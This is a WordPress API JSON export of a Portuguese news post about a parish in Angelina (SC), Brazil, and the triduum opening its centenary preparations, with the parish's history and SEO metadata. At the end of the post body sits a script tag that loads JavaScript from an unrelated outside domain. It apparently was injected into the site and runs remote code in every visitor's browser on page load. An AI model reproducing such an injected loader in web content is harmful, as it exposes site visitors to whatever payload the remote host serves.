{"id":158764,"date":"2018-05-04T22:48:34","date_gmt":"2018-05-05T01:48:34","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=158764"},"modified":"2020-08-10T15:35:37","modified_gmt":"2020-08-10T18:35:37","slug":"abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html","title":{"rendered":"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC)"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignright size-full wp-image-227745\" src=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_1.jpg\" alt=\"\" width=\"375\" height=\"500\" srcset=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_1.jpg 375w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_1-338x450.jpg 338w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_1-150x200.jpg 150w\" sizes=\"(max-width: 375px) 100vw, 375px\" \/>No dia 5 de maio, \u00e0s 19h, no Santu\u00e1rio Nossa Senhora da Imaculada Concei\u00e7\u00e3o, a solene celebra\u00e7\u00e3o da Santa Missa, marcar\u00e1 a abertura do Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio, (1921-2021), da Par\u00f3quia Nossa Senhora da Imaculada Concei\u00e7\u00e3o, Angelina\/Rancho Queimado (SC).<\/p>\n<p><strong>A PAR\u00d3QUIA<\/strong><\/p>\n<p>A Par\u00f3quia foi institu\u00edda no dia 8 de abril de 1921, por Dom Joaquim Domingues de Oliveira, Bispo da Arquidiocese de Florian\u00f3polis. Naquela \u00e9poca, Angelina era um distrito do munic\u00edpio de S\u00e3o Jos\u00e9 (SC), e at\u00e9 ent\u00e3o fazia parte da Par\u00f3quia de Santo Amaro (SC).<\/p>\n<p>Em 16 de setembro de 1946, a capela S\u00e3o Carlos Borromeu foi desmontada para dar lugar \u00e0 nova Igreja, que teria como primeira Padroeira Nossa Senhora da Imaculada Concei\u00e7\u00e3o, e S\u00e3o Carlos Borromeu como seu segundo Padroeiro. A constru\u00e7\u00e3o foi feita em tempo recorde de 18 meses. A Igreja foi uma constru\u00e7\u00e3o esplendorosa para a \u00e9poca: bem espa\u00e7osa, com duas torres de 35 metros de altura, vitrais bel\u00edssimos e pintura simples, mas que real\u00e7ava as linhas da arquitetura.<\/p>\n<p>Foi inaugurada em 23 de maio de 1948 com a presen\u00e7a de uma multid\u00e3o. Milhares de pessoas esperavam com muita \u00e2nsia a abertura das portas desse novo templo em um pequeno vilarejo entre montanhas verdejantes. Em 11 de fevereiro de 2007, ap\u00f3s bel\u00edssimo trabalho de restaura\u00e7\u00e3o, sob a orienta\u00e7\u00e3o do arquiteto Ari Acioli, foi reinaugurada a Igreja Matriz.<\/p>\n<p>Atualmente, a Par\u00f3quia conta com 18 comunidades, abrangendo os munic\u00edpios de Angelina e Rancho Queimado. Nos anos de 2018, 2019, 2020 ir\u00e1 se celebrar os Tr\u00edduos em prepara\u00e7\u00e3o para o Jubileu Centen\u00e1rio que acontecer\u00e1 em 2021.<\/p>\n<p><img loading=\"lazy\" class=\"aligncenter\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/convite_angelina.jpg\" alt=\"convite_angelina\" width=\"575\" height=\"751\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Par\u00f3quia de Angelina <\/p>\n","protected":false},"author":1,"featured_media":227746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[101,563],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Par\u00f3quia de Angelina\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-05T01:48:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-08-10T18:35:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"600\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg\",\"width\":800,\"height\":600},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html\",\"name\":\"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#primaryimage\"},\"datePublished\":\"2018-05-05T01:48:34+00:00\",\"dateModified\":\"2020-08-10T18:35:37+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC)\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html","og_locale":"pt_BR","og_type":"article","og_title":"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos","og_description":"Par\u00f3quia de Angelina","og_url":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-05T01:48:34+00:00","article_modified_time":"2020-08-10T18:35:37+00:00","og_image":[{"width":800,"height":600,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/angelina_d.jpg","width":800,"height":600},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html","name":"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC) - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#primaryimage"},"datePublished":"2018-05-05T01:48:34+00:00","dateModified":"2020-08-10T18:35:37+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/abertura-do-triduo-em-preparacao-ao-centenario-da-paroquia-na-sa-da-imaculada-conceicao-em-angelina-sc.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Tr\u00edduo em prepara\u00e7\u00e3o ao Centen\u00e1rio da Par\u00f3quia de Angelina (SC)"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/158764"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=158764"}],"version-history":[{"count":2,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/158764\/revisions"}],"predecessor-version":[{"id":227747,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/158764\/revisions\/227747"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/227746"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=158764"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=158764"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=158764"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}